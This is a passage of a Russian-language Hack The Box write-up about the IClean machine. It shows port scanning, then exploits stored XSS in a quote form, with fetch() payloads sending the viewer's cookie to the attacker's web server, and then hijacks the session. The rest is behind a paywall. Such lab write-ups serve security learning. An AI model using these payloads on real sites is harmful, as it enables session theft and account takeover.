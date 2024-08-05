В этом рай­тапе я покажу, как экс­плу­ати­ровать уяз­вимость XSS в для кра­жи cookie поль­зовате­ля, а затем уяз­вимость SSTI — для выпол­нения кода в сис­теме. Для прод­вижения исполь­зуем учет­ные дан­ные, получен­ные из базы дан­ных. При повыше­нии при­виле­гий вос­поль­зуем­ся излишни­ми раз­решени­ями ути­литы qpdf.

На­ша цель — получе­ние прав супер­поль­зовате­ля на машине IСlean с учеб­ной пло­щад­ки Hack The Box. Уро­вень ее слож­ности — сред­ний.

warning

Под­клю­чать­ся к машинам с HTB рекомен­дует­ся толь­ко через VPN. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

 

Разведка

 

Сканирование портов

До­бав­ляем IP-адрес машины в /etc/hosts:

10.10.11.12    iclean.htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов

Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да.

На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A).

Результат работы скрипта
Ре­зуль­тат работы скрип­та

Ска­нер нашел все­го два откры­тых пор­та:

  • 22 — служ­ба OpenSSH 8.9p1;
  • 80 — веб‑сер­вер Apache 2.4.52.

Как обыч­но в таких слу­чаях начина­ем с про­вер­ки сай­та.

Главная страница сайта
Глав­ная стра­ница сай­та
 

Точка входа

Изу­чая сайт, находим фор­му заказа услуг.

Содержимое страницы quote
Со­дер­жимое стра­ницы quote

От­меча­ем все позиции и выпол­няем заказ. Затем в Burp History смот­рим на сам зап­рос к сер­веру и про­веря­ем отправ­ляемые парамет­ры.

Запрос в Burp History
Зап­рос в Burp History

В парамет­рах отправ­ляют­ся не зна­чения true и false, что было бы логич­нее, а наз­вание услу­ги. Ско­рее все­го, ука­зан­ные в заказе услу­ги отоб­ража­ются у дру­гого поль­зовате­ля, поэто­му сто­ит про­верить, нет ли здесь XSS. Для это­го запус­тим веб‑сер­вер:

python3 -m http.server

Ком­бинаци­ей кла­виш Ctrl-R перенап­равим зап­рос из Burp History в Burp Repeater и засыла­ем базовую наг­рузку, которая выпол­нит зап­рос на наш веб‑сер­вер.

<img src=x onerror=fetch("http://10.10.14.83:8000/test_xss");>
Запрос в Burp Repeater
Зап­рос в Burp Repeater
Логи веб-сервера
Ло­ги веб‑сер­вера

В логах видим зап­рос, а зна­чит, сер­вис уяз­вим. Теперь поп­робу­ем увес­ти куки поль­зовате­ля, который прос­матри­вает заказы.

<img src=x onerror=fetch("http://10.10.14.83:8000/"+document.cookie);>
Запрос в Burp Repeater
Зап­рос в Burp Repeater
Логи веб-сервера
Ло­ги веб‑сер­вера

При­меня­ем иден­тифика­тор сес­сии в локаль­ном хра­нили­ще бра­узе­ра Chrome и перехо­дим на стра­ницу /dashboard.

Страница авторизованного пользователя
Стра­ница авто­ризо­ван­ного поль­зовате­ля

Нам ста­ли дос­тупны новые фун­кции, прой­дем­ся по ним по поряд­ку.

 

Точка опоры

Нач­нем с генера­тор QR-кода. Пер­вым делом нам необ­ходимо получить Invoice ID.

Страница /QRGenerator
Стра­ница /QRGenerator
Страница /InvoiceGenerator
Стра­ница /InvoiceGenerator

Продолжение доступно только участникам

Материалы из последних выпусков становятся доступны по отдельности только через два месяца после публикации. Чтобы продолжить чтение, необходимо стать участником сообщества «Xakep.ru».

Присоединяйся к сообществу «Xakep.ru»!

Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии